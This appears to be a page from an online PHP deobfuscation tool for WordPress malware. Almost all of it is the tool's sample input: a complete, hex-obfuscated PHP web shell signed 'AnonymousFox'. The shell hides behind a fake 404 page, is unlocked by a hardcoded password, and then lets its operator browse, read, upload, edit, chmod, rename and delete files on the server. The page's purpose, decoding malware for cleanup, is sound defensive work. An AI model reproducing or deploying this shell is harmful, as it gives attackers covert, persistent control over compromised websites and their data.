Japanese English

PHP deobfuscation, decryption, reconstruction tool

De-obfuscate PHP malware/viruses and tampering code on Wordpress to original readable code.

*Please note that not all obfuscation codes can be decoded.

Decoded the code below.

<?php ${"G\x4c\x4f\x42\x41LS"}["\x74bm\x6ca\x73\x6e\x70\x6a"]="\x69\x6e\x66\x6f";${"\x47\x4cOBAL\x53"}["\x6e\x68\x6en\x71\x69\x73\x75\x6a"]="p\x65r\x6ds";${"\x47\x4c\x4fBAL\x53"}["b\x6f\x77\x62\x61\x75\x77\x79s"]="fi\x6c\x65";${"G\x4cO\x42A\x4c\x53"}["\x70\x64u\x6d\x64s\x69oe"]="\x73\x69z\x65";${...



Obfuscated php code

<?php ${"G\x4c\x4f\x42\x41LS"}["\x74bm\x6ca\x73\x6e\x70\x6a"]="\x69\x6e\x66\x6f";${"\x47\x4cOBAL\x53"}["\x6e\x68\x6en\x71\x69\x73\x75\x6a"]="p\x65r\x6ds";${"\x47\x4c\x4fBAL\x53"}["b\x6f\x77\x62\x61\x75\x77\x79s"]="fi\x6c\x65";${"G\x4cO\x42A\x4c\x53"}["\x70\x64u\x6d\x64s\x69oe"]="\x73\x69z\x65";${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x72s\x63\x65\x66\x6d\x68\x6a\x7aj"]="\x64\x69r";${"\x47L\x4fBAL\x53"}["\x67\x63\x69\x67\x6eji"]="scan\x64i\x72";${"\x47\x4c\x4fBAL\x53"}["\x78t\x6c\x62\x72yu\x63p\x72"]="\x70at";${"\x47LO\x42\x41LS"}["\x6big\x62ulr\x65\x6d\x75"]="i";${"\x47L\x4f\x42A\x4cS"}["\x67\x66\x72\x66\x6cp\x73q\x65\x68\x6c"]="i\x64";${"\x47\x4cO\x42\x41LS"}["\x6d\x67\x69\x6e\x71\x78\x61r\x6d"]="\x70at\x68\x73";${"GLO\x42A\x4cS"}["\x68m\x72\x6bllm\x64"]="\x70\x61\x74h";${"G\x4c\x4f\x42A\x4c\x53"}["\x6c\x61\x62\x79\x76mz\x6f\x70\x78\x72"]="p\x61\x73\x73\x77\x6fr\x64";${"\x47L\x4fBALS"}["\x6a\x6er\x64\x70\x73"]="\x70a\x73s";$jclgpbeadx="p\x61\x74\x68";$sxqfmim="p\x61\x73\x73wo\x72\x64";${"\x47\x4cOB\x41\x4c\x53"}["c\x79\x6f\x6b\x66\x63\x64wh\x68"]="\x70\x61s\x73";$xwekasa="\x63\x68k_\x6co\x67in";${"\x47\x4c\x4f\x42\x41L\x53"}["\x63\x79\x64\x6e\x75v\x65\x6dea"]="\x70\x61s\x73\x77\x6f\x72\x64";@session_start();$vipcdkodln="\x63\x68\x6b\x5fl\x6fg\x69\x6e";@set_time_limit(0);@${${"\x47\x4cO\x42A\x4c\x53"}["\x6anr\x64\x70s"]}=$_POST["F\x75\x63k"];${$xwekasa}=true;${${"GLOB\x41\x4c\x53"}["\x63\x79\x64\x6euv\x65m\x65\x61"]}="F f\x75ckA\x6c\x6c\x20O";if(${${"\x47\x4cO\x42\x41LS"}["\x63\x79\x6f\x6b\x66\x63dw\x68h"]}==${$sxqfmim}){$_SESSION["\x6es\x74"]="$pass";}if(${$vipcdkodln}==true){if(!isset($_SESSION["ns\x74"])or$_SESSION["\x6e\x73t"]!=${${"GLO\x42\x41\x4c\x53"}["\x6c\x61\x62\x79v\x6d\x7a\x6f\x70\x78\x72"]}){die("\n\x20\x3c\x68e\x61\x64\x3e\n<tit\x6c\x65\x3e4\x30\x34\x20Not \x46\x6f\x75nd</\x74it\x6c\x65>\n</\x68\x65ad>\x3c\x62\x6f\x64y\x3e\n<h1\x3eNot F\x6f\x75\x6ed\x3c/\x68\x31\x3e\n<\x70>\x54he \x72equested\x20URL\x20w\x61s n\x6ft\x20\x66o\x75\x6e\x64 o\x6e \x74\x68i\x73\x20\x73e\x72\x76\x65\x72\x2e</p\x3e\n<\x70\x3e\x41d\x64\x69t\x69ona\x6cly, a\x204\x30\x34 N\x6ft\x20\x46\x6fu\x6e\x64\ne\x72ror \x77\x61s e\x6ec\x6fu\x6e\x74er\x65d wh\x69\x6ce\x20t\x72yin\x67\x20\x74o\x20u\x73\x65\x20an \x45rro\x72\x44\x6f\x63ume\x6e\x74 \x74\x6f\x20\x68\x61n\x64l\x65\x20\x74\x68\x65 \x72equest.</p>\n<\x68r\x3e\n\x3cad\x64\x72e\x73\x73\x3e\x41\x70\x61\x63he/\x32.4.1\x36 (Unix)\x20O\x70\x65n\x53\x53L/\x31\x2e\x30.\x31\x65-\x66\x69p\x73 \x6d\x6fd\x5fbw\x6ci\x6d\x69t\x65\x64/1\x2e4 S\x65rv\x65r\x20a\x74\x20\x50o\x72t\x2080\x3c/\x61ddre\x73\x73>\n\x3c/b\x6fd\x79\x3e\n\x20 \n<t\x69\x74\x6c\x65\x3e\x41\x6e\x6f\x6eym\x6f\x75sF\x6f\x78</ti\x74\x6ce>\n \x20\x3cce\x6e\x74er\x3e\n  \x3ctable\x20b\x6f\x72der\x3d0\x20\x63e\x6c\x6c\x70\x61dd\x69n\x67\x3d\x30 ce\x6c\x6csp\x61cin\x67\x3d0 wi\x64t\x68=1\x30\x30% he\x69g\x68t=\x31\x30\x30%>\n\x20\x20<t\x72><\x74d\x20\x76al\x69g\x6e\x3dmidd\x6ce\x20\x61\x6cig\x6e=\x63e\x6et\x65r\x3e\n\x20\x20\n\x20 \x3cf\x6f\x72m m\x65tho\x64=\x70\x6f\x73\x74>\n  \x3c\x66o\x6et\x20si\x7a\x65\x3d\x31\x20fa\x63e\x3d\x76\x65r\x64ana\x20\x63o\x6c\x6fr=\x3e<\x73\x74ron\x67\x3e\x3c\x63en\x74er></cen\x74er\x3e</\x73trong\x3e\x3cbr>\n\x20\x20<\x69\x6ep\x75t t\x79pe\x3dFu\x63\x6b\x20n\x61\x6d\x65\x3dFuc\x6b\x20\x73\x69\x7a\x65=\x31\x3e\n  \x3c/fo\x72m>\n\x20\x20\n\x20\x20");}}echo"\x3c!DOC\x54\x59PE\x20\x48\x54\x4dL>\n\x3c\x48TML>\n<HEA\x44>\n\x3cli\x6e\x6b hr\x65f=\x22\x22 r\x65\x6c\x3d\"\x73\x74\x79\x6c\x65\x73hee\x74\" t\x79pe=\"t\x65x\x74/\x63s\x73\"\x3e\n<t\x69t\x6ce\x3eCo\x643\x64\x20\x42y\x20\x41n\x6fny\x6do\x75\x73\x46o\x78</\x74\x69\x74le\x3e\n<\x73\x74yle>\n\x62o\x64\x79{\n\x66\x6fn\x74-\x66\x61\x6d\x69\x6cy: \"\x52ac\x69\x6e\x67\x20Sa\x6es One\x22, \x63u\x72si\x76e;\n\x62a\x63kg\x72o\x75n\x64-c\x6flo\x72: \x23e\x36e6e6\x3b\n\x74\x65\x78t-sh\x61dow:0px \x30px \x31p\x78\x20\x23\x37\x357575\x3b\n}\n#\x63o\x6ete\x6e\x74 \x74\x72:\x68\x6fver{\n\x62a\x63kg\x72\x6f\x75\x6ed-\x63\x6fl\x6fr: #\x36\x336\x3263\x3b\nt\x65\x78t-\x73ha\x64\x6f\x77:0px 0px\x2010\x70\x78\x20\x23\x66\x66f;\n}\n#c\x6f\x6eten\x74\x20.f\x69rs\x74{\n\x62ac\x6b\x67\x72o\x75\x6e\x64-\x63\x6f\x6c\x6f\x72:\x20\x73\x69lv\x65\x72\x3b\n}\n#cont\x65n\x74\x20.\x66\x69\x72s\x74:\x68\x6f\x76er{\n\x62ac\x6bg\x72ou\x6ed-\x63o\x6cor:\x20si\x6c\x76er;\nt\x65xt-\x73ha\x64ow:\x30\x70\x78 0\x70x\x20\x31\x70x\x20#75757\x35;\n}\n\x74a\x62l\x65{\nborde\x72:\x201\x70x\x20\x23\x300\x30\x30\x30\x30\x20\x64ot\x74ed\x3b\n}\n\x48\x31{\nfont-\x66ami\x6c\x79: \x22Ry\x65\",\x20\x63\x75\x72\x73\x69\x76\x65\x3b\n}\na{\n\x63\x6f\x6c\x6fr: \x23\x30\x30\x30\x3b\nt\x65x\x74-\x64eco\x72a\x74i\x6f\x6e: \x6eon\x65\x3b\n}\na:h\x6f\x76\x65r{\nco\x6co\x72: #\x66\x66\x66;\n\x74\x65x\x74-\x73hado\x77:\x30\x70x\x200p\x78\x20\x310\x70x\x20\x23f\x66f\x66\x66\x66;\n}\ninput,s\x65l\x65\x63t,te\x78\x74\x61\x72ea{\n\x62or\x64\x65\x72:\x201px #\x300\x300\x30\x30 solid;\n-\x6d\x6fz-b\x6frd\x65r-\x72ad\x69\x75\x73:\x20\x35\x70\x78\x3b\n-\x77eb\x6b\x69t-b\x6f\x72d\x65\x72-\x72a\x64\x69u\x73:\x35p\x78;\n\x62\x6frd\x65r-r\x61d\x69\x75\x73:5\x70\x78\x3b\n}\n</sty\x6c\x65\x3e\n</H\x45\x41\x44>\n\x3cBODY\x3e\n<\x48\x31\x3e\x3c\x63e\x6e\x74\x65\x72>\x48ack\x65d \x42y \x41n\x6fnym\x6f\x75\x73F\x6fx</c\x65\x6et\x65r\x3e</\x481\x3e\n<\x74a\x62le \x77i\x64t\x68=\x2270\x30\x22\x20\x62o\x72der=\x220\" \x63\x65\x6c\x6cpa\x64d\x69n\x67\x3d\x22\x33\"\x20c\x65l\x6c\x73\x70ac\x69\x6e\x67=\x22\x31\"\x20ali\x67n=\x22\x63\x65nt\x65\x72\">\n\x3c\x74r><t\x64>C\x75\x72\x72e\x6et\x20Path\x20: ";$trvktk="i\x64";$zycdyeebcy="\x70\x61t";if(isset($_GET["p\x61\x74\x68"])){${${"\x47\x4cOB\x41\x4cS"}["\x68\x6d\x72\x6b\x6c\x6c\x6d\x64"]}=$_GET["\x70\x61\x74h"];}else{${"\x47\x4c\x4f\x42\x41LS"}["b\x68uio\x6fj\x6frpe\x6d"]="\x70\x61\x74\x68";${${"G\x4c\x4f\x42\x41\x4cS"}["b\x68\x75\x69\x6f\x6f\x6a\x6f\x72\x70em"]}=getcwd();}${${"\x47\x4c\x4fB\x41\x4cS"}["\x68\x6d\x72\x6b\x6cl\x6d\x64"]}=str_replace("\x5c","/",${${"\x47\x4cO\x42\x41\x4cS"}["\x68mr\x6bl\x6cmd"]});${${"G\x4cOB\x41\x4cS"}["\x6dg\x69\x6e\x71\x78arm"]}=explode("/",${$jclgpbeadx});foreach(${${"\x47\x4c\x4f\x42A\x4c\x53"}["m\x67\x69\x6e\x71x\x61\x72\x6d"]} as${$trvktk}=>${$zycdyeebcy}){${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x6a\x6e\x62\x71\x67l\x79n\x76"]="pat";${"GL\x4f\x42\x41\x4c\x53"}["b\x6d\x69\x6d\x77s\x72\x6a\x68\x74\x75"]="\x69";if(${${"\x47\x4c\x4f\x42\x41LS"}["\x6a\x6e\x62\x71g\x6c\x79n\x76"]}==""&&${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x67frf\x6cp\x73\x71e\x68\x6c"]}==0){${"\x47\x4c\x4fBALS"}["n\x62a\x64\x65m\x6c\x6f\x79\x62xb"]="\x61";${${"GL\x4fBA\x4c\x53"}["\x6e\x62\x61d\x65\x6d\x6c\x6fyb\x78b"]}=true;echo"\x3c\x61\x20hr\x65f\x3d\"?p\x61t\x68=/\"\x3e/\x3c/a>";continue;}${"G\x4c\x4f\x42\x41LS"}["\x69\x74\x77\x6abs\x67"]="\x70\x61t";${"\x47LO\x42\x41\x4c\x53"}["\x6a\x71\x67qj\x75v\x6e\x6bs\x6bf"]="\x69";if(${${"G\x4c\x4f\x42\x41L\x53"}["\x69\x74\x77j\x62\x73\x67"]}=="")continue;$lckssbflqo="\x69";echo"<\x61\x20h\x72e\x66\x3d\"?\x70at\x68=";for(${$lckssbflqo}=0;${${"G\x4cO\x42\x41L\x53"}["b\x6d\x69\x6dw\x73\x72j\x68t\x75"]}<=${${"G\x4c\x4fB\x41L\x53"}["\x67f\x72\x66\x6c\x70\x73q\x65h\x6c"]};${${"\x47L\x4f\x42A\x4c\x53"}["j\x71\x67\x71\x6a\x75v\x6ek\x73k\x66"]}++){echo"$paths[$i]";if(${${"\x47L\x4f\x42\x41\x4c\x53"}["\x6b\x69g\x62\x75\x6c\x72e\x6du"]}!=${${"\x47\x4c\x4fBALS"}["gf\x72\x66\x6c\x70\x73qehl"]})echo"/";}echo"\x22\x3e".${${"\x47\x4c\x4f\x42AL\x53"}["x\x74\x6cb\x72\x79uc\x70\x72"]}."</a\x3e/";}echo"</\x74d\x3e</\x74\x72>\x3ct\x72>\x3c\x74\x64>";if(isset($_FILES["\x66ile"])){$hloelgm="\x70\x61\x74\x68";if(copy($_FILES["\x66\x69\x6c\x65"]["tmp\x5f\x6e\x61\x6de"],${$hloelgm}."/".$_FILES["\x66\x69l\x65"]["name"])){echo"\x3cf\x6f\x6et\x20\x63o\x6c\x6f\x72=\x22\x67reen\"\x3e\x46i\x6c\x65 Up\x6co\x61d \x44\x6f\x6e\x65\x2e\x3c/f\x6fn\x74\x3e<b\x72 /\x3e";}else{echo"\x3c\x66\x6f\x6et\x20col\x6fr=\x22\x72\x65d\x22\x3eF\x69\x6ce \x55plo\x61d \x45rr\x6f\x72\x2e\x3c/\x66ont\x3e\x3cb\x72 />";}}echo"<fo\x72\x6d\x20\x65n\x63\x74\x79\x70e=\x22m\x75lt\x69\x70a\x72\x74/f\x6fr\x6d-dat\x61\" me\x74\x68od=\x22PO\x53T\"\x3e\n\x55p\x6co\x61d\x20\x46ile\x20:\x20<\x69\x6ep\x75t\x20t\x79\x70\x65=\"\x66i\x6ce\x22\x20\x6e\x61m\x65=\x22f\x69l\x65\x22 /\x3e\n\x3cinpu\x74\x20type=\x22sub\x6dit\" v\x61\x6c\x75e=\"uplo\x61\x64\x22\x20/\x3e\n</f\x6frm>\n</\x74\x64></t\x72>";if(isset($_GET["\x66\x69l\x65\x73r\x63"])){echo"<tr>\x3c\x74\x64>Cu\x72\x72\x65\x6e\x74 \x46i\x6ce :\x20";echo$_GET["f\x69les\x72c"];echo"</\x74r\x3e</td>\x3c/\x74\x61ble\x3e<b\x72\x20/\x3e";echo("\x3c\x70\x72\x65>".htmlspecialchars(file_get_contents($_GET["f\x69le\x73r\x63"]))."\x3c/\x70re\x3e");}elseif(isset($_GET["op\x74i\x6f\x6e"])&&$_POST["\x6f\x70t"]!="de\x6c\x65\x74\x65"){echo"</\x74\x61bl\x65\x3e\x3c\x62\x72\x20/>\x3ccen\x74\x65\x72>".$_POST["\x70a\x74h"]."<\x62r />\x3cb\x72\x20/\x3e";if($_POST["o\x70\x74"]=="c\x68\x6do\x64"){if(isset($_POST["pe\x72\x6d"])){if(chmod($_POST["p\x61th"],$_POST["\x70\x65rm"])){echo"<\x66\x6fnt\x20\x63ol\x6fr\x3d\x22gr\x65en\x22>Ch\x61\x6ege Pe\x72\x6d\x69ssi\x6f\x6e\x20\x44one\x2e\x3c/font\x3e\x3cbr />";}else{echo"<\x66\x6f\x6e\x74\x20\x63olo\x72=\"re\x64\"\x3eChange\x20Pe\x72m\x69\x73s\x69o\x6e\x20Err\x6fr.\x3c/fo\x6et\x3e\x3cb\x72\x20/\x3e";}}echo"\x3c\x66\x6frm\x20me\x74ho\x64=\"\x50\x4fST\">\nPe\x72\x6diss\x69o\x6e\x20: \x3cinp\x75\x74\x20n\x61m\x65=\"pe\x72\x6d\"\x20ty\x70\x65=\"tex\x74\"\x20si\x7ae=\"\x34\"\x20v\x61\x6c\x75e\x3d\x22".substr(sprintf("\x25\x6f",fileperms($_POST["\x70\x61\x74h"])),-4)."\x22\x20/\x3e\n<in\x70ut t\x79\x70\x65\x3d\x22h\x69dde\x6e\"\x20\x6e\x61\x6de=\"\x70\x61\x74\x68\x22 \x76alu\x65=\x22".$_POST["pa\x74\x68"]."\x22>\n<inp\x75\x74 t\x79p\x65\x3d\x22\x68id\x64\x65\x6e\" \x6e\x61\x6d\x65=\"\x6fpt\" val\x75e=\x22\x63h\x6dod\x22\x3e\n\x3c\x69\x6e\x70ut typ\x65=\x22s\x75\x62mi\x74\" \x76\x61\x6cu\x65=\"G\x6f\"\x20/>\n</f\x6frm\x3e";}elseif($_POST["\x6f\x70\x74"]=="\x72ena\x6de"){if(isset($_POST["\x6eewna\x6de"])){if(rename($_POST["\x70\x61th"],${${"G\x4c\x4fBA\x4c\x53"}["\x68\x6drk\x6cl\x6dd"]}."/".$_POST["\x6e\x65\x77name"])){echo"<\x66o\x6e\x74\x20\x63\x6f\x6c\x6fr\x3d\x22\x67r\x65en\"\x3eC\x68a\x6e\x67\x65\x20\x4e\x61me\x20\x44\x6fne\x2e\x3c/\x66o\x6et\x3e<b\x72 />";}else{echo"<font\x20\x63\x6f\x6c\x6f\x72=\x22re\x64\x22>\x43ha\x6ege\x20N\x61\x6d\x65 E\x72\x72or.</f\x6fn\x74><\x62\x72 />";}$_POST["\x6e\x61\x6d\x65"]=$_POST["\x6ee\x77\x6eame"];}echo"<\x66o\x72\x6d\x20\x6de\x74h\x6f\x64=\x22PO\x53T\"\x3e\nNew\x20N\x61\x6d\x65\x20:\x20<\x69\x6ep\x75t \x6e\x61\x6d\x65=\"ne\x77\x6e\x61\x6de\x22\x20t\x79pe=\"text\" \x73i\x7ae=\"2\x30\" va\x6cue\x3d\x22".$_POST["\x6ea\x6d\x65"]."\" />\n<i\x6ep\x75t \x74ype\x3d\"\x68\x69\x64\x64\x65n\x22 \x6ea\x6d\x65\x3d\x22\x70\x61\x74\x68\x22\x20\x76\x61lu\x65\x3d\"".$_POST["\x70a\x74h"]."\x22>\n<i\x6epu\x74\x20\x74\x79\x70e\x3d\"\x68\x69d\x64e\x6e\"\x20\x6e\x61\x6de\x3d\"\x6f\x70\x74\x22 \x76\x61\x6c\x75e\x3d\"\x72\x65\x6ea\x6d\x65\"\x3e\n<\x69\x6ep\x75\x74 ty\x70e\x3d\"\x73u\x62\x6di\x74\x22 \x76\x61l\x75\x65\x3d\"\x47\x6f\"\x20/\x3e\n</\x66\x6fr\x6d>";}elseif($_POST["\x6f\x70\x74"]=="e\x64\x69\x74"){if(isset($_POST["s\x72c"])){$qwxldrs="fp";${$qwxldrs}=fopen($_POST["p\x61\x74\x68"],"w");$fgutum="\x66\x70";${"G\x4c\x4fBALS"}["\x61\x77ak\x7a\x65s\x6e\x75"]="\x66\x70";if(fwrite(${${"\x47\x4cO\x42\x41L\x53"}["\x61\x77a\x6bze\x73\x6e\x75"]},$_POST["\x73\x72c"])){echo"\x3c\x66\x6f\x6et\x20colo\x72\x3d\x22\x67\x72e\x65\x6e\x22\x3eE\x64it\x20\x46\x69\x6ce\x20\x44\x6f\x6ee.\x3c/\x66ont><br\x20/>";}else{echo"<\x66\x6f\x6e\x74\x20co\x6c\x6f\x72\x3d\"r\x65d\x22\x3eEdit \x46i\x6ce \x45r\x72or\x2e</f\x6fn\x74>\x3c\x62r />";}fclose(${$fgutum});}echo"\x3c\x66o\x72\x6d me\x74\x68\x6fd=\x22\x50\x4fST\x22>\n\x3c\x74ex\x74ar\x65a \x63o\x6cs\x3d\x38\x30 ro\x77\x73\x3d20 \x6eam\x65=\x22\x73rc\">".htmlspecialchars(file_get_contents($_POST["\x70\x61th"]))."</t\x65x\x74\x61re\x61>\x3c\x62\x72 /\x3e\n<in\x70\x75\x74\x20\x74\x79pe=\"hi\x64\x64\x65\x6e\"\x20na\x6de=\x22\x70\x61t\x68\" \x76a\x6cu\x65\x3d\"".$_POST["\x70a\x74\x68"]."\x22\x3e\n<\x69\x6ep\x75\x74 ty\x70e\x3d\"\x68id\x64en\x22\x20\x6e\x61me\x3d\x22op\x74\"\x20va\x6cue=\x22\x65\x64\x69\x74\x22\x3e\n\x3cin\x70u\x74 \x74\x79pe=\"\x73ubmit\x22\x20\x76a\x6cue=\"\x47o\"\x20/\x3e\n</for\x6d\x3e";}echo"</\x63\x65\x6e\x74\x65\x72>";}else{${"G\x4c\x4fB\x41\x4c\x53"}["jj\x75\x74\x70\x75\x6f\x78\x6f\x74"]="sc\x61\x6edi\x72";echo"\x3c/t\x61bl\x65>\x3cb\x72\x20/>\x3cce\x6e\x74er\x3e";if(isset($_GET["op\x74i\x6f\x6e"])&&$_POST["\x6fp\x74"]=="\x64e\x6ce\x74e"){if($_POST["t\x79pe"]=="di\x72"){if(rmdir($_POST["\x70a\x74\x68"])){echo"\x3cfo\x6e\x74\x20\x63\x6f\x6co\x72=\x22g\x72een\x22\x3e\x44\x65l\x65t\x65 D\x69r\x20\x44\x6fne\x2e\x3c/font><\x62\x72\x20/\x3e";}else{echo"\x3c\x66\x6f\x6et\x20co\x6c\x6fr\x3d\"re\x64\x22\x3eDe\x6cet\x65 D\x69\x72\x20Er\x72\x6f\x72.\x3c/\x66on\x74><\x62\x72\x20/\x3e";}}elseif($_POST["\x74y\x70\x65"]=="\x66il\x65"){if(unlink($_POST["\x70a\x74h"])){echo"<\x66o\x6e\x74 \x63o\x6c\x6fr\x3d\x22\x67\x72ee\x6e\x22\x3eD\x65l\x65\x74e \x46i\x6c\x65\x20\x44o\x6e\x65\x2e</f\x6fn\x74><\x62r\x20/>";}else{echo"<\x66o\x6et c\x6f\x6c\x6fr=\"red\x22>D\x65\x6c\x65te\x20\x46i\x6ce\x20\x45r\x72o\x72\x2e</fo\x6et\x3e\x3c\x62\x72 />";}}}echo"</c\x65\x6e\x74er>";${${"\x47L\x4f\x42\x41L\x53"}["g\x63\x69\x67nj\x69"]}=scandir(${${"\x47\x4cOB\x41\x4c\x53"}["\x68\x6dr\x6bll\x6d\x64"]});$danrbui="f\x69l\x65";echo"\x3c\x64\x69\x76 \x69d\x3d\x22cont\x65\x6e\x74\x22><ta\x62le\x20\x77i\x64t\x68=\"\x37\x300\x22\x20\x62\x6f\x72der=\x22\x30\" cell\x70ad\x64i\x6e\x67=\"3\x22 c\x65\x6cl\x73\x70\x61cin\x67=\"\x31\x22 ali\x67\x6e=\x22c\x65\x6e\x74e\x72\">\n\x3c\x74r clas\x73=\x22f\x69r\x73\x74\">\n\x3ctd\x3e<c\x65nte\x72>\x4e\x61\x6d\x65\x3c/\x63\x65\x6e\x74er\x3e</td\x3e\n<td\x3e\x3c\x63e\x6et\x65r\x3e\x53\x69z\x65</c\x65nter\x3e</td\x3e\n\x3c\x74d\x3e<c\x65\x6eter\x3ePe\x72m\x69s\x73\x69\x6fns</c\x65n\x74er></\x74d\x3e\n<td><center>O\x70\x74i\x6fns</ce\x6et\x65r\x3e\x3c/t\x64\x3e\n</\x74\x72\x3e";foreach(${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x67\x63\x69g\x6e\x6ai"]} as${${"\x47\x4c\x4f\x42\x41L\x53"}["r\x73\x63\x65fmh\x6a\x7a\x6a"]}){$ifxtpvlja="\x64ir";if(!is_dir("$path/$dir")||${$ifxtpvlja}=="\x2e"||${${"\x47\x4c\x4fBA\x4c\x53"}["\x72\x73\x63\x65\x66\x6d\x68j\x7a\x6a"]}=="..")continue;echo"<\x74r>\n<t\x64\x3e\x3ca \x68r\x65\x66=\"?\x70a\x74\x68\x3d$path/$dir\x22\x3e$dir</a>\x3c/td>\n<t\x64><\x63\x65\x6ete\x72>--\x3c/ce\x6eter>\x3c/\x74\x64>\n\x3ctd><\x63e\x6e\x74\x65\x72>";if(is_writable("$path/$dir"))echo"<\x66o\x6e\x74 \x63olor\x3d\x22\x67\x72\x65e\x6e\">";elseif(!is_readable("$path/$dir"))echo"<f\x6f\x6e\x74\x20\x63olo\x72=\"\x72\x65\x64\x22\x3e";echo perms("$path/$dir");if(is_writable("$path/$dir")||!is_readable("$path/$dir"))echo"\x3c/font\x3e";echo"</\x63e\x6et\x65\x72></td\x3e\n<t\x64\x3e\x3c\x63\x65\x6et\x65r\x3e\x3cfor\x6d \x6de\x74\x68\x6fd=\"PO\x53\x54\x22 \x61ct\x69on\x3d\"?\x6fpt\x69\x6fn\x26\x70a\x74h\x3d$path\">\n\x3c\x73\x65le\x63t \x6ea\x6d\x65=\x22\x6f\x70\x74\"\x3e\n<o\x70\x74i\x6f\x6e\x20\x76\x61lu\x65=\"\x22\x3e</\x6fpt\x69\x6f\x6e>\n<op\x74\x69on\x20\x76a\x6cu\x65\x3d\"\x64e\x6ce\x74\x65\x22\x3eDel\x65\x74\x65\x3c/op\x74i\x6fn>\n<\x6fpt\x69\x6fn \x76a\x6c\x75e=\x22c\x68m\x6fd\x22\x3eChmod\x3c/\x6fpt\x69o\x6e>\n\x3c\x6f\x70t\x69o\x6e\x20\x76\x61l\x75e=\"\x72e\x6ea\x6de\"\x3e\x52ename</o\x70\x74i\x6fn\x3e\n</s\x65\x6c\x65\x63\x74>\n<in\x70u\x74\x20t\x79pe=\x22h\x69\x64den\"\x20n\x61m\x65=\x22\x74\x79p\x65\"\x20v\x61\x6cue\x3d\"\x64i\x72\"\x3e\n\x3c\x69npu\x74\x20ty\x70\x65=\x22hi\x64den\" na\x6d\x65=\x22n\x61me\"\x20v\x61\x6c\x75\x65=\x22$dir\x22>\n<i\x6ep\x75t t\x79p\x65\x3d\x22\x68idden\x22 \x6eam\x65\x3d\x22p\x61\x74h\x22\x20\x76alu\x65=\"$path/$dir\x22>\n\x3c\x69\x6ep\x75\x74 t\x79\x70e=\"\x73ub\x6di\x74\x22\x20va\x6cu\x65\x3d\x22>\" /\x3e\n\x3c/\x66o\x72\x6d></\x63\x65n\x74\x65r\x3e\x3c/\x74\x64>\n\x3c/tr\x3e";}echo"\x3c\x74r \x63l\x61ss\x3d\x22f\x69r\x73\x74\x22><\x74d>\x3c/\x74d><\x74d\x3e</t\x64\x3e\x3c\x74\x64></td><\x74\x64\x3e\x3c/\x74d\x3e\x3c/\x74r\x3e";foreach(${${"\x47LO\x42\x41\x4c\x53"}["\x6a\x6a\x75\x74\x70\x75\x6f\x78\x6f\x74"]} as${$danrbui}){$bsfpmqkaxz="\x73\x69\x7a\x65";if(!is_file("$path/$file"))continue;${${"\x47\x4c\x4f\x42A\x4cS"}["pd\x75mdsi\x6f\x65"]}=filesize("$path/$file")/1024;${$bsfpmqkaxz}=round(${${"\x47\x4cOB\x41L\x53"}["p\x64\x75mdsi\x6f\x65"]},3);if(${${"\x47\x4cOB\x41\x4cS"}["p\x64\x75\x6d\x64s\x69oe"]}>=1024){$rzssuloo="\x73\x69ze";${"\x47\x4c\x4f\x42AL\x53"}["\x63\x78\x75ed\x72f\x64"]="\x73i\x7a\x65";${${"G\x4c\x4fBA\x4c\x53"}["cx\x75e\x64\x72\x66d"]}=round(${$rzssuloo}/1024,2)."\x20M\x42";}else{${${"\x47\x4cOBA\x4cS"}["\x70\x64\x75\x6dd\x73\x69\x6f\x65"]}=${${"\x47L\x4fB\x41\x4cS"}["\x70du\x6d\x64s\x69\x6f\x65"]}."\x20KB";}echo"<\x74\x72\x3e\n<\x74d>\x3c\x61 \x68r\x65\x66\x3d\"?\x66\x69l\x65\x73r\x63\x3d$path/$file&p\x61th=$path\">$file\x3c/\x61\x3e\x3c/t\x64\x3e\n\x3c\x74\x64><c\x65\x6e\x74\x65r\x3e".${${"G\x4cO\x42\x41L\x53"}["\x70du\x6d\x64\x73\x69\x6f\x65"]}."\x3c/\x63\x65nt\x65r\x3e\x3c/\x74d>\n\x3c\x74d><\x63e\x6e\x74\x65r\x3e";if(is_writable("$path/$file"))echo"<\x66o\x6e\x74 \x63o\x6co\x72\x3d\"green\">";elseif(!is_readable("$path/$file"))echo"<\x66\x6f\x6et\x20\x63olor=\x22r\x65d\"\x3e";echo perms("$path/$file");if(is_writable("$path/$file")||!is_readable("$path/$file"))echo"</fon\x74>";echo"</c\x65n\x74\x65r>\x3c/t\x64\x3e\n\x3ct\x64\x3e<ce\x6e\x74er\x3e<\x66\x6fr\x6d me\x74\x68\x6f\x64=\x22\x50OS\x54\" \x61cti\x6f\x6e\x3d\"?op\x74i\x6f\x6e&\x70\x61t\x68\x3d$path\x22>\n<\x73elec\x74 \x6eame\x3d\"o\x70\x74\x22>\n<op\x74\x69\x6f\x6e \x76alue\x3d\x22\"></\x6f\x70\x74ion\x3e\n\x3c\x6f\x70tio\x6e\x20\x76a\x6cue\x3d\x22d\x65l\x65\x74e\"\x3e\x44\x65le\x74e</\x6f\x70ti\x6fn>\n\x3co\x70t\x69\x6fn\x20value\x3d\"\x63h\x6do\x64\x22>\x43h\x6d\x6f\x64\x3c/o\x70\x74ion>\n<opti\x6f\x6e \x76al\x75\x65=\x22r\x65n\x61m\x65\">Re\x6ea\x6de\x3c/opt\x69\x6f\x6e\x3e\n<op\x74ion v\x61\x6cue=\"\x65d\x69t\"\x3eEd\x69t\x3c/optio\x6e\x3e\n</sel\x65c\x74>\n<\x69np\x75t\x20\x74\x79\x70e\x3d\x22h\x69d\x64en\" \x6e\x61\x6de\x3d\"\x74\x79\x70\x65\x22\x20v\x61\x6cu\x65=\"f\x69l\x65\">\n<\x69\x6e\x70ut \x74y\x70e=\"\x68i\x64\x64\x65n\" \x6eame=\x22na\x6d\x65\"\x20\x76\x61\x6c\x75\x65\x3d\"$file\x22>\n<\x69n\x70\x75\x74 t\x79\x70\x65=\x22hidd\x65n\x22\x20n\x61\x6de\x3d\"\x70ath\"\x20\x76\x61l\x75e\x3d\x22$path/$file\">\n<\x69n\x70\x75\x74 t\x79p\x65\x3d\"\x73\x75\x62m\x69\x74\"\x20\x76alu\x65=\x22>\"\x20/>\n\x3c/f\x6frm>\x3c/cent\x65r\x3e\x3c/\x74\x64\x3e\n\x3c/tr\x3e";}echo"\x3c/t\x61\x62l\x65>\n\x3c/d\x69\x76\x3e";}echo"\x3cbr\x20/>\x48ac\x6bed\x20\x42\x79\x20A\x6e\x6f\x6ey\x6d\x6f\x75\x73Fo\x78\x3c\x66ont \x63\x6fl\x6fr\x3d\"red\x22>1\x2e\x30</fo\x6e\x74\x3e, 